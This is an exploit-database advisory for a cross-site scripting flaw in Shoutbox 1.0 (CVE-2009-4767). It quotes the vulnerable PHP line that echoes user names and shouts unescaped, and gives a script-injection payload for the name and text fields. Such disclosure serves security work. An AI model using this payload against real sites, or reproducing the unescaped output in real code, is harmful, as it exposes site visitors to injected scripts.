Shoutbox 1.0 - HTML / Cross-Site Scripting Injection
Author: SkuLL-HackeR
type: webapps
platform: php
port: nan
date_added: 2009-11-17
date_updated: 2009-11-18
verified: 1
codes: OSVDB-60310;CVE-2009-4767
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comShoutbox_1-0.zip
# Vulnerable Code in index.php :
#
# <p><strong><?php echo $names[$i]; ?>:</strong> <?php echo $shouts[$i]; ?></p>
#
########################################
# Shoutbox 1.0 HTML / Xss inejction exploit
# AuTh0r : SKuLL-HacKeR
# H0ME : Sec-Best & SaudiHack & S3curity-Art
# Email : My@Hotmail.iT
########################################
Vendor: http://www.plohni.com
exploit:
site.com/Shoutbox/index.php
in the select your name and your text put this code
'">><script>alert('XSS skh')</script>